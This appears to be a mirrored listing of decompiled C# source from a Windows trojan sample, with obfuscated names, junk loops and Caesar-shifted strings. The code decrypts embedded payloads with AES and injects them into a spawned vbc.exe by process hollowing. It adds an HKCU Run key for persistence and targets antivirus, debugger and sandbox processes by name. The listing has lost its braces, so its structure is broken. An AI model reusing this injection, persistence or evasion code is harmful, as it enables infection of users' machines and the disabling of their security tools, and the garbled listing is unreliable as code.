mirror of
synced 2025-02-11 09:22:06 +00:00
2720 lines
111 KiB
2720 lines
111 KiB
// Decompiled with JetBrains decompiler
// Type: ÄÎÄÊ42
// Assembly: xfxjrxud, Version=, Culture=neutral, PublicKeyToken=null
// MVID: 4A5F7493-5A47-4C7B-AE6D-A2D9AB0DAFA1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.Shakblades.amh-7b1789fc6dbf64c86ed5e6c9d3d3aa35a9a75e0461449b6b35899ba19ab7aba9.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
internal sealed class ÄÎÄÊ42
private static short ÁÛ;
public static byte fÔ(int ÌqlÜoÞ, int ÑÐidÔ)
if (true)
ulong num1 = 16;
while (num1 <= 22UL);
if (true)
sbyte num2 = 17;
while (num2 <= (sbyte) 66);
if (true)
if (true)
Decimal limit = 88M;
Decimal num = 20M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M))
num = Decimal.Add(num, 1M);
return 0;
public static void Åore6Ú(string bi6gv, bool Ôÿ0xºÖ, string qsÝn7d, string Þrkÿg6)
string str = "LH\\{Y";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
sbyte num = 11;
while (num <= (sbyte) 87);
foreach (Process process in Process.GetProcessesByName(qsÝn7d))
public static string Ë80(ushort É_ß_Ûh, string jtÊgÒq, Decimal ËÑÒf, ulong btÉÈpv, Decimal ØÖÚ)
bool flag = true;
long num = 1;
while (num <= 69L);
if (!flag)
StringBuilder stringBuilder = new StringBuilder();
string str = jtÊgÒq;
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
stringBuilder.Append(Convert.ToChar((int) Convert.ToByte(ch) - 3));
return stringBuilder.ToString();
public static byte[] Ð0(int ß0sa, byte[] ÉÚÖ, DateTime cigwy, byte iukgÆ)
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
Decimal limit = 101M;
for (Decimal num = 18M; ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M); num = Decimal.Add(num, 1M))
if (false)
byte[] numArray = new byte[13]
(byte) 172,
(byte) 133,
(byte) 245,
(byte) 26,
(byte) 237,
(byte) 131,
(byte) 2,
(byte) 252,
(byte) 70,
(byte) 169,
(byte) 17,
(byte) 79,
(byte) 242
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(numArray, numArray, 1);
rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) rijndaelManaged.KeySize / 8.0));
rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes((int) Math.Round((double) rijndaelManaged.BlockSize / 8.0));
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(ÉÚÖ, 0, ÉÚÖ.Length);
public static int zj(int Ækdj, byte[] ÈÙn2, bool uiËÆ4)
if (true)
string str = "*Vp";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
int num = 15;
while (num <= 25);
if (true)
Decimal limit = 36M;
Decimal num1 = 10M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num1, limit, 1M))
num1 = Decimal.Add(num1, 1M);
return System.Drawing.Color.FromArgb((int) ÈÙn2[Ækdj + 3], (int) ÈÙn2[Ækdj + 2], (int) ÈÙn2[Ækdj + 1], (int) ÈÙn2[Ækdj]).ToArgb();
public static byte[] uhµq78(int lÅ7ÍÞ, DateTime ÿh_l)
string str = "MC^9qg?o\\w";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
System.Drawing.Color color = System.Drawing.Color.FromArgb(lÅ7ÍÞ);
return new byte[4]{ color.B, color.G, color.R, color.A };
[DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr nwiÈ([MarshalAs(UnmanagedType.VBByRefStr)] ref string eÅ);
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr yÅ(IntPtr eÅ, [MarshalAs(UnmanagedType.VBByRefStr)] ref string bk8);
public static bk8 eÅ<bk8>(string ºÚÅÂi, string ÄÙpÕ, int aÄrÖ, DateTime xßÂÓÕ, bool ÅzØÀ)
if (false)
if (false)
return (bk8) Marshal.GetDelegateForFunctionPointer(ÄÎÄÊ42.yÅ(ÄÎÄÊ42.nwiÈ(ref ÄÙpÕ), ref ºÚÅÂi), typeof (bk8));
public static void d0eÏke(object d0eÏke)
MethodInfo entryPoint = Assembly.Load((byte[]) d0eÏke).EntryPoint;
if (entryPoint.GetParameters().Length == 1)
entryPoint.Invoke((object) null, new object[1]
(object) new string[0]
entryPoint.Invoke((object) null, (object[]) null);
if (true)
public static void ÿеÚÌ2(string ºÍÇcÜ, byte[] ÿеÚÌ2, string Ê9Ás)
if (ÿеÚÌ2[60] == (byte) 128)
Thread thread = new Thread(new ParameterizedThreadStart(ÄÎÄÊ42.d0eÏke));
thread.Start((object) ÿеÚÌ2);
string qÂ1;
foreach (string directory in Directory.GetDirectories(Conversions.ToString(Environment.SystemDirectory[0]) + ÄÎÄÊ42.Ë80((ushort) 2155, "=_Zlqgrzv_Plfurvriw1QHW_Iudphzrun", 2061105127M, 2115499156UL, 0M)))
if (directory.ToLower().Contains(ÄÎÄÊ42.Ë80((ushort) 15829, "y5131", 1196871844M, 1250544732UL, 1480870424M)))
qÂ1 = directory + ÄÎÄÊ42.Ë80((ushort) 16922, "_yef1h{h", 213968319M, 1125617184UL, -515900160M);
int num1 = ÄÎÄÊ42.zj(60, ÿеÚÌ2, false);
short int16 = BitConverter.ToInt16(ÿеÚÌ2, num1 + 6);
IntPtr ÎÌÆ8_1 = new IntPtr(ÄÎÄÊ42.zj(num1 + 84, ÿеÚÌ2, false));
IntPtr[] ÖÔ = new IntPtr[4];
IntPtr num2;
if (!ÄÎÄÊ42.eÅ<ÄÎÄÊ42.yÝÆbl>(ÄÎÄÊ42.Ë80((ushort) 0, "FuhdwhSurfhvvD", 947106602M, 1283024727UL, 556013894M), ÄÎÄÊ42.Ë80((ushort) 27359, "nhuqho65", 2108968263M, 1472272860UL, 1418322051M), 93371123, DateTime.Now, false)((string) null, qÂ1, num2, num2, false, 4, num2, (string) null, new byte[0], ÖÔ))
uint[] qÂ2 = new uint[179];
qÂ2[0] = 65538U;
if (ÄÎÄÊ42.eÅ<ÄÎÄÊ42.nØ>(ÄÎÄÊ42.Ë80((ushort) 31242, "JhwWkuhdgFrqwh{w", 1401062252M, 1899214721UL, 1248014975M), ÄÎÄÊ42.Ë80((ushort) 23347, "nhuqho65", -702908542M, 2015860422UL, 1857519582M), 1388390421, DateTime.Now, true)(ÖÔ[1], qÂ2))
IntPtr h1;
IntPtr edÇ;
if (ÄÎÄÊ42.eÅ<ÄÎÄÊ42.cÈØ>(ÄÎÄÊ42.Ë80((ushort) 14692, "UhdgSurfhvvPhpru|", 1823167432M, 1084544445UL, 1715065738M), ÄÎÄÊ42.Ë80((ushort) 20269, "nhuqho65", 0M, 621053347UL, -99411088M), 0, DateTime.Now, true)(ÖÔ[0], new IntPtr((long) qÂ2[41] + 8L), ref h1, new IntPtr(4), ref edÇ))
if (ÄÎÄÊ42.eÅ<ÄÎÄÊ42.ÉÉr>(ÄÎÄÊ42.Ë80((ushort) 2303, "QwXqpdsYlhzRiVhfwlrq", 1315419410M, 293262549UL, 60975105M), ÄÎÄÊ42.Ë80((ushort) 28856, "qwgoo", -1010863505M, 1503637346UL, 110327080M), 1930160895, DateTime.Now, false)(ÖÔ[0], h1) == 0U)
ÄÎÄÊ42.mÎhÄÀa mÎhÄàa = ÄÎÄÊ42.eÅ<ÄÎÄÊ42.mÎhÄÀa>(ÄÎÄÊ42.Ë80((ushort) 24564, "YluwxdoDoorfH{", -124257453M, 1116376755UL, 1476618721M), ÄÎÄÊ42.Ë80((ushort) 25315, "nhuqho65", 2127429307M, 361403930UL, 1584508225M), -270134058, DateTime.Now, false);
IntPtr ÿеÚÌ2_1 = ÖÔ[0];
IntPtr num3 = new IntPtr(ÄÎÄÊ42.zj(num1 + 52, ÿеÚÌ2, true));
IntPtr qÂ3 = num3;
IntPtr num4 = new IntPtr(ÄÎÄÊ42.zj(num1 + 80, ÿеÚÌ2, true));
IntPtr h2 = num4;
IntPtr qÂ4 = mÎhÄàa(ÿеÚÌ2_1, qÂ3, h2, 12288, 64);
ÄÎÄÊ42.w_zzÛ wZzÛ1 = ÄÎÄÊ42.eÅ<ÄÎÄÊ42.w_zzÛ>(ÄÎÄÊ42.Ë80((ushort) 0, "ZulwhSurfhvvPhpru|", -771002506M, 888391754UL, 437836762M), ÄÎÄÊ42.Ë80((ushort) 0, "nhuqho65", 0M, 144728661UL, 0M), 1154098651, DateTime.Now, false);
int num5 = wZzÛ1(ÖÔ[0], qÂ4, ÿеÚÌ2, ÎÌÆ8_1, ref edÇ) ? 1 : 0;
int[] dst1 = new int[10];
int num6 = (int) int16 - 1;
for (int index1 = 0; index1 <= num6; ++index1)
Buffer.BlockCopy((Array) ÿеÚÌ2, num1 + 248 + index1 * 40, (Array) dst1, 0, 40);
byte[] dst2 = new byte[dst1[4] - 1 + 1];
if (true)
sbyte num7 = 2;
while (num7 <= (sbyte) 48);
string str = "4>y#e";
int index2 = 0;
for (int length = str.Length; index2 < length; ++index2)
char ch = str[index2];
Buffer.BlockCopy((Array) ÿеÚÌ2, dst1[5], (Array) dst2, 0, dst2.Length);
ÄÎÄÊ42.w_zzÛ wZzÛ2 = wZzÛ1;
IntPtr ÿеÚÌ2_2 = ÖÔ[0];
num4 = new IntPtr(qÂ4.ToInt32() + dst1[3]);
IntPtr qÂ5 = num4;
byte[] h3 = dst2;
num3 = new IntPtr(dst2.Length);
IntPtr ÎÌÆ8_2 = num3;
ref IntPtr local = ref edÇ;
int num8 = wZzÛ2(ÿеÚÌ2_2, qÂ5, h3, ÎÌÆ8_2, ref local) ? 1 : 0;
ÄÎÄÊ42.w_zzÛ wZzÛ3 = wZzÛ1;
IntPtr ÿеÚÌ2_3 = ÖÔ[0];
num4 = new IntPtr((long) qÂ2[41] + 8L);
IntPtr qÂ6 = num4;
byte[] h4 = ÄÎÄÊ42.uhµq78(qÂ4.ToInt32(), DateTime.Now);
num3 = new IntPtr(4);
IntPtr ÎÌÆ8_3 = num3;
ref IntPtr local1 = ref edÇ;
int num9 = wZzÛ3(ÿеÚÌ2_3, qÂ6, h4, ÎÌÆ8_3, ref local1) ? 1 : 0;
qÂ2[44] = (uint) (qÂ4.ToInt32() + ÄÎÄÊ42.zj(num1 + 40, ÿеÚÌ2, true));
int num10 = ÄÎÄÊ42.eÅ<ÄÎÄÊ42.nØ>(ÄÎÄÊ42.Ë80((ushort) 9067, "VhwWkuhdgFrqwh{w", 795717856M, 685104029UL, -817129474M), ÄÎÄÊ42.Ë80((ushort) 663, "nhuqho65", -601614195M, 1679759056UL, 1243959477M), 879327758, DateTime.Now, false)(ÖÔ[1], qÂ2) ? 1 : 0;
int num11 = ÄÎÄÊ42.eÅ<ÄÎÄÊ42.ßu5jÆy>(ÄÎÄÊ42.Ë80((ushort) 4838, "UhvxphWkuhdg", 0M, 0UL, -718438709M), ÄÎÄÊ42.Ë80((ushort) 0, "nhuqho65", 37770836M, 1358597425UL, 1077852726M), 315166272, DateTime.Now, false)(ÖÔ[1]);
if (true)
ulong num12 = 1;
while (num12 <= 49UL);
Decimal limit = 22M;
Decimal num13 = 0M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num13, limit, 1M))
num13 = Decimal.Add(num13, 1M);
catch (Exception ex)
public static void Main()
ÄÎÄÊ42.Åore6Ú("aqJU*Z'>`Q", false, ÄÎÄÊ42.Ë80((ushort) 16973, "pedp", 789290427M, 840134411UL, 966533662M), "{3*(g");
ÄÎÄÊ42.Åore6Ú("['Go7", false, ÄÎÄÊ42.Ë80((ushort) 21693, "}ofolhqw", 0M, 248151122UL, 505966609M), "&_yYa/)");
ÄÎÄÊ42.Åore6Ú("MBk BEF", false, ÄÎÄÊ42.Ë80((ushort) 14800, "hjxl", 650854649M, 1825965699UL, -1015115903M), "_,QPjL");
ÄÎÄÊ42.Åore6Ú("')}8Urg", true, ÄÎÄÊ42.Ë80((ushort) 0, "vdpsoh", -870879264M, 0UL, 0M), "@^raNGQU");
ÄÎÄÊ42.Åore6Ú("Y/y8a-", true, ÄÎÄÊ42.Ë80((ushort) 32740, "egdjhqw", 539127069M, 2104806640UL, 1991063130M), "#}-p");
ÄÎÄÊ42.Åore6Ú("}{YOm?RN", false, ÄÎÄÊ42.Ë80((ushort) 12881, "dys", 217980584M, 585947185UL, 651054778M), "KG<N4_j<F");
ÄÎÄÊ42.Åore6Ú("47aAV", false, ÄÎÄÊ42.Ë80((ushort) 10476, "roo|gej", 1547724055M, 1124135514UL, 0M), "zoF");
ÄÎÄÊ42.Åore6Ú("%=&p)5.mgi", true, ÄÎÄÊ42.Ë80((ushort) 18260, "VelhVyf", 547771927M, 430962114UL, 2028388602M), "+C9Y;Ft3A,");
short num1 = 14;
while (num1 <= (short) 78);
ÄÎÄÊ42.Åore6Ú("Di+c", false, ÄÎÄÊ42.Ë80((ushort) 23297, "nh|vfudpeohu", 1439782639M, 1841219066UL, 0M), "xg.r");
ÄÎÄÊ42.Åore6Ú("gqD}^", false, ÄÎÄÊ42.Ë80((ushort) 0, "YPzduh#VYJD#LL", 1785152707M, 782473748UL, 1487466096M), "\\`bg");
ÄÎÄÊ42.Åore6Ú("2<iGa66", true, ÄÎÄÊ42.Ë80((ushort) 27971, "wdvnpju", 0M, 1821911254UL, 348156460M), "[(3kw");
ÄÎÄÊ42.Åore6Ú("P?_~", false, ÄÎÄÊ42.Ë80((ushort) 14919, "zluhvkdun", 32168260M, 1538462804UL, 1542275088M), "DY?oQ");
double num2 = 7.0;
while (num2 <= 75.0);
ÄÎÄÊ42.Åore6Ú((string) null, true, ÄÎÄÊ42.Ë80((ushort) 32322, "klmdfnwklv", -876396305M, 1223294340UL, 503411703M), "[P:ZWf");
ÄÎÄÊ42.Åore6Ú("HJ9^", false, ÄÎÄÊ42.Ë80((ushort) 0, "qsipvj", 1541202324M, 0UL, -423214282M), "K KAk<");
ÄÎÄÊ42.Åore6Ú((string) null, true, ÄÎÄÊ42.Ë80((ushort) 16897, "dyjxl", 534051672M, 14399232UL, 0M), "cO}'=S=");
ÄÎÄÊ42.Åore6Ú("_Zy,Ke", true, ÄÎÄÊ42.Ë80((ushort) 0, "Vs|ErwVG", 1780260729M, 1422849379UL, -538445572M), "K~7{)q");
if (false)
ResourceManager resourceManager = new ResourceManager("xu4apwsb", Assembly.GetExecutingAssembly());
ÄÎÄÊ42.ÿеÚÌ2((string) null, ÄÎÄÊ42.Ð0(0, (byte[]) resourceManager.GetObject("ØÀÜ"), DateTime.Now, (byte) 14), "Fc@q2,{d");
ÄÎÄÊ42.ÿеÚÌ2("?PUsY", ÄÎÄÊ42.Ð0(-135195882, (byte[]) resourceManager.GetObject("Ô"), DateTime.Now, (byte) 206), "3=% ");
string location = Assembly.GetEntryAssembly().Location;
string str = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), ÄÎÄÊ42.Ë80((ushort) 4635, "Surjudp1h{h", 922808611M, 1601170459UL, 1812585349M));
if (!File.Exists(str))
File.Copy(location, str);
Registry.CurrentUser.CreateSubKey(ÄÎÄÊ42.Ë80((ushort) 0, "Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_Uxq", 1964367823M, 2048683479UL, 0M)).SetValue(ÄÎÄÊ42.Ë80((ushort) 8304, "Surjudp", 555673281M, 767282096UL, 892424687M), (object) str);
public class Þu
public Þu()
public void Õ1Ûßx(long É2Ó7m, ulong ÉÒ, int zÈxr)
if (false)
public void nsswÍ(byte ÕtÓ, byte ÜÁÙËq, string qeÆnØÈ)
if (false)
public class µÉËÿÎ
private sbyte enÎm;
public µÉËÿÎ() => this.enÎm = (sbyte) 126;
public void ÏqÈ88(int i_Ê, double lwmo, byte w5, Decimal Ïxb, Decimal Áey)
string str = "L1y(U+N";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
short num = 7;
while (num <= (short) 33);
public class jlbÑy
public jlbÑy()
public class okÇ
public okÇ()
public Decimal ĵ(bool sÍz, double ÇaÕźs)
string str1 = "zB4Zm`";
int index1 = 0;
for (int length = str1.Length; index1 < length; ++index1)
char ch = str1[index1];
if (false)
string str2 = "dg4e;sO";
int index2 = 0;
for (int length = str2.Length; index2 < length; ++index2)
char ch = str2[index2];
Decimal limit = 88M;
Decimal num = 18M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M))
num = Decimal.Add(num, 1M);
return 278754729M;
public class rÜÛ
private DateTime rÎc;
private float ÏÏ3ÛÝ;
public rÜÛ()
this.rÎc = DateTime.Now;
this.ÏÏ3ÛÝ = 0.0f;
public delegate int gȺ(byte whh2);
public delegate float ºzÚxÛÊ(
string gtÁxße,
float ÑÈ5Ý,
short Ãt,
string ÔÂ,
double ÍlfÆw);
public class omxÔr
private int eeÝÌÓµ;
private Decimal cbÇÆ;
public omxÔr()
this.eeÝÌÓµ = 0;
this.cbÇÆ = 0M;
public void zÂ(float ÓÕ1m, int º2fy, sbyte Ø)
long num = 16;
while (num <= 121L);
if (true)
string str = "83_9";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
public void É(sbyte fÕfc, double ÏÇØ8, sbyte cÂÛÔ)
if (true)
string str = "0pNE8";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
uint num = 0;
while (num <= 57U);
if (false)
public class lÚ4
private uint ÁÉmÙbÃ;
public lÚ4() => this.ÁÉmÙbà = 0U;
public class Ëk
public Ëk()
public class ºÔ
public ºÔ()
public void ǺÀ2º()
if (false)
public ushort i9ÒhcÖ(ushort qº, int Û1Üt, ushort Éq5Ì6Ê)
if (true)
if (false)
DateTime now = DateTime.Now;
return 26112;
public class nÛe
private short ofnsÇc;
public nÛe() => this.ofnsÇc = (short) 21884;
public class º0Ì
public º0Ì()
[DllImport("twain_32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern double ÑÝ(bool zÝ, byte ßyº);
public ulong ÖÞ(sbyte mÈqÃÔ, int ÊÕÄÐ, double Ûc)
if (true)
uint num1 = 1;
while (num1 <= 82U);
long num2 = 5;
while (num2 <= 111L);
string str = "E(O8@1Rm,P";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 0;
public int ÝÀÜ(double gra, long mmÜ, byte z)
if (true)
int num1 = 2;
while (num1 <= 58);
float num2 = 15f;
sbyte num3 = 18;
while (num3 <= (sbyte) 70);
while ((double) num2 <= 109.0);
if (false)
return 0;
public delegate void Êb(
uint dtÓ9Êÿ,
int ºÑ1,
short ß2mÌ,
byte ÍßpyÍ,
double É22jÐ7);
public class nÖÁ
private ushort Æÿ;
public nÖÁ() => this.Æÿ = (ushort) 28531;
public void É4wb()
if (false)
string str = "'a[B>~";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
if (false)
ushort num = 15;
if (false)
while (num <= (ushort) 81);
if (false)
public short yÞ(long sÓº)
if (false)
if (true)
if (true)
Decimal limit = 62M;
Decimal num = 3M;
while (ObjectFlowControl.ForLoopControl.ForNextCheckDec(num, limit, 1M))
num = Decimal.Add(num, 1M);
return 14073;
public class ÝkÃ0
public ÝkÃ0()
public short ºÓËÏ()
if (true)
long num = 15;
if (false)
string str = "n;BaEq)";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
while (num <= 53L);
string str1 = "Pgo_j5KEeoso";
int index1 = 0;
for (int length = str1.Length; index1 < length; ++index1)
char ch = str1[index1];
return 18108;
public void µ(bool qj, float ÏÌ, long ix3, string ÕÈÙt6, long Ãdgg)
if (false)
public class Ü
private long ÆÞ;
public Ü() => this.ÆÞ = 2054404714L;
public class ÿÕ6ÅlÂ
public ÿÕ6ÅlÂ()
public void Ý(
Decimal ËÉz85Í,
float Êrf3yÉ,
short ÅiÂ,
sbyte tkrnÀ,
byte w8ÜgÒ)
if (true)
string str = "H2";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
public delegate string yÀÓÇÿ();
public class gÿÅÉÅÞ
private DateTime rÕ;
public gÿÅÉÅÞ()
[DllImport("gdiplus", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern DateTime ÅÅ(int ÈyÔ29È, double ÊÝÖ, short Î);
public delegate long Ú(uint mfÌ, double ÇÛÅiÊ, float ÞyÓ);
public delegate void ÖÎloÉÎ(long ÑÛrzÀß, short ÁÀÑ, uint Ï1, double ÀÝ);
public delegate void Á_(short chÉ, double ÐËÛsÙÕ, DateTime ÆÇ, byte Âxx);
public class Ü1µbÒ
private uint ºpt2;
public Ü1µbÒ() => this.ºpt2 = 1036348976U;
public void wc(int rcwÂ, float µÞ, DateTime ÌÞÊÜ1o)
if (false)
if (false)
public class ÁÜÁbß
private ulong ÒÿË;
private double ÍÀ;
private bool ÚßÜÏÙx;
public ÁÜÁbß()
this.ÍÀ = 18176.8993;
this.ÚßÜÏÙx = false;
public string eÓÛ(
float ËÒ4gÃ,
long ÿÿµ,
int iØÑ7m,
long qÅhÜ,
short r2Îk)
if (true)
bool flag = true;
string str = "b9of4c";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
if (!flag)
return "js\\V";
public class Îÿ2ÆÇt
private uint uÍÝÂ;
private string ÆqkÏÿ;
public Îÿ2ÆÇt()
this.uÍÝÂ = 295119373U;
this.ÆqkÏÿ = "pHe;Tw\\";
public void Ä809Ùg(ushort Ô_ÝaÇ1, uint oصÍ, ushort ywÉ, string Çt9)
if (false)
ulong num = 16;
while (num <= 111UL);
if (false)
if (false)
public void ÔÏÃÉ(
uint Òdw,
ulong ÝÉÒ,
sbyte ÚoËÓer,
long Çs,
short Óib)
double num = 17.0;
while (num <= 68.0);
public string ß6eÀi(DateTime s4, ulong apÎrµµ)
string str = "*FDz`Hxj4";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
sbyte num1 = 11;
if (true)
while (num1 <= (sbyte) 94);
long num2 = 15;
while (num2 <= 124L);
if (false)
return "(}%zX";
public class ÁeÚo
public ÁeÚo()
public void yj(uint gm_6, short zÆÈ5, string cj_xÀd, long ØÚÓbmw)
DateTime now = DateTime.Now;
uint num = 11;
while (num <= 120U);
public void y8f(bool Ë4Ä, ulong s0h)
int num1 = 6;
while (num1 <= 83);
double num2 = 1.0;
short num3 = 7;
while (num3 <= (short) 57);
while (num2 <= 94.0);
ulong num4 = 6;
while (num4 <= 105UL);
[DllImport("wlanapi", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void Ä6d();
[DllImport("mpr", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void ÉÏÀÒÔy(
int À7l80,
bool ÔÇÆß,
ushort Öaµe4j);
public ulong ilo60(float ÓÇzqÆ)
if (true)
byte num = 10;
while (num <= (byte) 105);
if (true)
if (false)
return 860894507;
public class ÄÃ
public ÄÃ()
public DateTime Ïrµ(long mp1)
byte num = 18;
bool flag = false;
if (false)
if (!flag)
while (num <= (byte) 96);
return DateTime.Now;
public delegate byte ÙÉÆ(
ushort tm,
DateTime ÛpÆ,
ushort Ûsb3,
ushort Êm);
public class Û0883
private byte ÙÓ;
public Û0883() => this.ÙÓ = (byte) 0;
public class eÛÓ
public eÛÓ()
public void ÕÏÓi(byte ßË, DateTime bÙ, bool ÝqgÛx)
public DateTime e7brÌ(sbyte pÂ5ÿkÌ)
if (false)
if (true)
if (false)
return DateTime.Now;
public class Èn9
public Èn9()
[DllImport("gsapi", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void uúÅ(short vÿÐrÃ, byte Ûu32sa);
public ushort µ2x(ushort o5oÃ)
string str = "ZamHXb4j)4Ew4";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
return 25945;
public long Ûaqv(long ÀÉ, double ÁÑql, double kcÍdÀÿ, string gkÎ)
if (true)
bool flag = true;
string str = "!AczJZV";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
if (!flag)
ulong num1 = 8;
long num2 = 3;
while (num2 <= 117L);
while (num1 <= 71UL);
return 628832406;
public delegate uint akÉx_À(string Ø9_Á, ulong µf);
public delegate void ßÂ9(float bi, long r5fv6, int ÑgÕ4);
public class ÉËßÇ5ÿ
public ÉËßÇ5ÿ()
public class ÙÈa64
private ulong ºµÉØËd;
private Decimal c3Õe;
private sbyte ßcfµ;
private bool ÎqÄÚ;
public ÙÈa64()
this.ºµÉØËd = 1921354434UL;
this.c3Õe = 1409353273M;
this.ßcfµ = (sbyte) -20;
this.ÎqÄÚ = true;
public delegate void Éb(bool qØÐÃ, long bÂ2Õ, int jdzj3);
public delegate void Êsm(Decimal wxËÂÊn);
public class ÙkÍ
private DateTime ËxÐ0Ã;
public ÙkÍ() => this.ËxÐ0Ã = DateTime.Now;
public delegate float ÝÄtÔle(string tÙ6Å, bool fiebcd, ulong Êf4Ö0);
public delegate void cwz(
short yrÒÀÏ,
bool zÉbÌqØ,
Decimal Ãxp5É,
byte kÏqÒe,
float bÛÛ7);
public class Ëw3ÏÜv
private byte xbÕÒ7Ã;
public Ëw3ÏÜv() => this.xbÕÒ7Ã = (byte) 95;
public void Éy2(
int kÍoÖÐ,
byte ÿ3,
Decimal kÁiÛ,
sbyte qrÃ,
ushort oÄÒmºv)
string str1 = "PsJXs:E";
int index1 = 0;
for (int length1 = str1.Length; index1 < length1; ++index1)
char ch1 = str1[index1];
string str2 = "eH>e)E92";
int index2 = 0;
for (int length2 = str2.Length; index2 < length2; ++index2)
char ch2 = str2[index2];
short num1 = 10;
while (num1 <= (short) 91);
short num2 = 20;
while (num2 <= (short) 104);
byte num3 = 0;
while (num3 <= (byte) 96);
public Decimal Þa8()
uint num1 = 17;
sbyte num2 = 1;
while (num2 <= (sbyte) 85);
if (false)
while (num1 <= 80U);
return 0M;
public class ÖÞÖÝaÌ
private ulong efÍ;
public ÖÞÖÝaÌ() => this.efÍ = 1392574999UL;
[DllImport("msvcrt", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern ulong iÕi(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ÇÑÛÙ,
ulong Òh2,
byte tÍÎÕÀf,
int Ñft);
public float ÿÝf(DateTime g3, float ßÀº)
if (true)
short num1 = 17;
while (num1 <= (short) 60);
if (true)
long num2 = 2;
while (num2 <= 82L);
return -24188f;
public void ÚyÌ(byte ß, ushort Ô3Ëe6, uint jf, bool ÊÔ9ÔÉ)
string str = "'}nW6";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
int num1 = 18;
while (num1 <= 80);
ushort num2 = 6;
while (num2 <= (ushort) 54);
public class x1
private short kÏË7;
private DateTime Èicf1;
public x1()
this.kÏË7 = (short) 30108;
this.Èicf1 = DateTime.Now;
public void bpkx(byte Ç_Åmst, long Ôfp, sbyte Òi, uint ÐwÖÒx)
if (false)
if (false)
public double ÍÕbeÌ2(
double ÔÌÉmÝÖ,
uint ÌÏÂÃÅÀ,
DateTime Ð61,
double ÄwÏÄ,
sbyte ÿwjl3)
if (true)
double num = 6.0;
if (false)
while (num <= 45.0);
return -16267.0;
[DllImport("glut32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void ÂÊËÂÛ();
public short ÖÒÍÇÔf(
byte ÊÐÞÚÜ,
string ÆxzÖ,
short ËwÆkÿ5,
string u6Ï1ÛÓ,
string hÎÂtz)
if (true)
string str = "wS(-;p";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
if (true)
if (false)
if (false)
return 299;
public delegate void cwoj(uint dÑ, float Õ7ÈÐ43);
public class ÇÉoeÿz
public ÇÉoeÿz()
[DllImport("credui", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void Ðz(int ÓppÞÏg);
public class ÍÖÓ
private uint jÜhw;
private string Ïn;
public ÍÖÓ() => this.Ïn = "2x(r6<]6b~pqX";
public int ÃÙoÚÜ(
short ÄfµÝÀ,
ushort hÐgr,
uint ÇjÎs,
DateTime Ücj9i,
uint Ûe)
int num1 = 0;
float num2 = 14f;
while ((double) num2 <= 30.0);
int num3 = 20;
while (num3 <= 47);
if (true)
DateTime now = DateTime.Now;
while (num1 <= 60);
return -1004937781;
public void Â9gÇÙÙ()
bool flag = true;
if (true)
if (!flag)
public class Ôd
private float ÑÔqÐÞ;
private float Ïzej8ÿ;
public Ôd() => this.Ïzej8ÿ = 15095f;
public void ÊÈk(
long ÃhÄ1Ó,
ushort ÃÕ4Ñ4,
ushort Évg1io,
float ØjÔ)
if (true)
float num = 19f;
while ((double) num <= 126.0);
string str = ">D/5ze";
int index = 0;
for (int length = str.Length; index < length; ++index)
char ch = str[index];
public class ow_Ð7Ï
public ow_Ð7Ï()
[DllImport("comctl32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void Ö4ÿØ(int ÈÀ, sbyte zÀfÊsº);
[DllImport("xolehlp", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern void ÿgjº(ulong gmØ);
public class ÈÊÖÓ
private string Ök;
public ÈÊÖÓ() => this.Ök = "#\\ ^K-RRT";
[DllImport("urlmon", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern ulong uÅ4µ3(short ÍÐxmj);
public void ºÀk(
string Ø1h_7,
DateTime ºÖÌÜØ,
double ÃËε,
float ÊÄÔjÞj)
ulong num = 8;
while (num <= 46UL);
